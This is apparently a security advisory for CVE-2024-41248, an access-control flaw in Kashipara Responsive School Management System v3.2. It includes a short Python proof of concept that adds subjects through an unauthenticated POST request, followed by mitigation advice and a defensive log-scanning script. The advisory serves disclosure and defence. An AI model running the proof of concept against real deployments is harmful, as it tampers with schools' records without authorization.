A recent security vulnerability has been discovered in the *Kashipara Responsive School Management System (KR-SMS) v3.2*. The vulnerability exists due to incorrect access control in two PHP scripts, /smsa/add_subject.php and /smsa/add_subject_submit.php. Exploiting this vulnerability, an unauthenticated remote attacker can add new subject entries to the system without proper privileges.

This post will provide more details on the vulnerability, including a code snippet demonstrating the exploit, links to original references, and in-depth analysis of the issue.

Vulnerability Details

CVE ID: CVE-2024-41248
Affected software: Kashipara Responsive School Management System v3.2
Vulnerability Type: Incorrect Access Control (CWE-285)
Risk Level: High
Attack Vector: Network

Description

The vulnerability allows any unauthenticated user to add new subject entries to the system. The affected files, /smsa/add_subject.php and /smsa/add_subject_submit.php, do not perform any access control checks, permitting malicious users to exploit this vulnerability.

Here is a code snippet that demonstrates how an attacker can exploit this vulnerability:

```python
import requests

# Replace the URL with the target server's URL.
target_url = "http://example.com/smsa/add_subject_submit.php"

# Replace with desired subject data.
subject_data = {
    "subcode": "TEST100",
    "subname": "Test Subject",
    "cat": "Theory"
}

response = requests.post(target_url, data=subject_data)

if response.status_code == 200:
    print("[+] Subject added successfully!")
else:
    print("[-] Failed to add subject.")
```

The attacker can simply use the above script to send a POST request with the desired subject data to the /smsa/add_subject_submit.php script of the target server. The server will then process the request and add the new subject without verifying the user's privileges or authentication.

Original References

1. CVE-2024-41248 - National Vulnerability Database (NVD)
2. Kashipara Responsive School Management System v3.2.

Mitigation and Recommendations

The developer of *Kashipara Responsive School Management System* should address this vulnerability by implementing proper access control checks in the affected scripts. They should ensure that only authenticated users with the necessary privileges can perform actions such as adding a new subject.

For administrators using KR-SMS, it is recommended to monitor the system for any suspicious activity and ensure strong authentication measures are in place. Additionally, applying any available patches or upgrading to a more recent version of the software can help mitigate the risk posed by this vulnerability.
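
For the monitoring recommended above, one triage heuristic, added here as an example and not part of the original advisory or the KR-SMS code base: flag POSTs to /smsa/add_subject_submit.php whose Referer is not the /smsa/add_subject.php form. It assumes the web server writes Apache/Nginx combined-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Script paths taken from the advisory text.
FORM_PATH = "/smsa/add_subject.php"
SUBMIT_PATH = "/smsa/add_subject_submit.php"

# Assumption: access logs use the Apache/Nginx "combined" format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def suspicious_subject_posts(lines):
    """Return log entries for POSTs to the submit script that did not come
    from the add-subject form (Referer missing or pointing elsewhere)."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Lowercase the path: case-insensitive filesystems serve case variants.
        path = urlsplit(m["target"]).path.lower()
        if m["method"] != "POST" or path != SUBMIT_PATH:
            continue
        if urlsplit(m["referer"]).path.lower() != FORM_PATH:
            hits.append({k: m[k] for k in ("ip", "ts", "status", "referer", "agent")})
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Aug/2024:16:20:01 +0000] "POST /smsa/add_subject_submit.php HTTP/1.1" 200 512 "-" "python-requests/2.32.3"',
    '192.0.2.10 - - [07/Aug/2024:16:21:40 +0000] "GET /smsa/add_subject.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Aug/2024:16:22:05 +0000] "POST /smsa/add_subject_submit.php HTTP/1.1" 302 0 "http://sms.example/smsa/add_subject.php" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Aug/2024:16:30:12 +0000] "POST /smsa/Add_Subject_Submit.php?x=1 HTTP/1.1" 200 512 "http://other.example/" "curl/8.5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_subject_posts(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} '
              f'referer={hit["referer"]!r} agent={hit["agent"]!r}')
```

The Referer header is client-controlled, so an empty result does not rule out abuse; treat hits as leads to compare against the subject records and the known administrator sessions.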

Always protect your servers and web applications with good security practices, such as keeping software up to date, using strong authentication mechanisms, and continuously monitoring for potential threats.

Timeline

Published on: 08/07/2024 16:15:45 UTC
Last modified on: 08/08/2024 15:07:27 UTC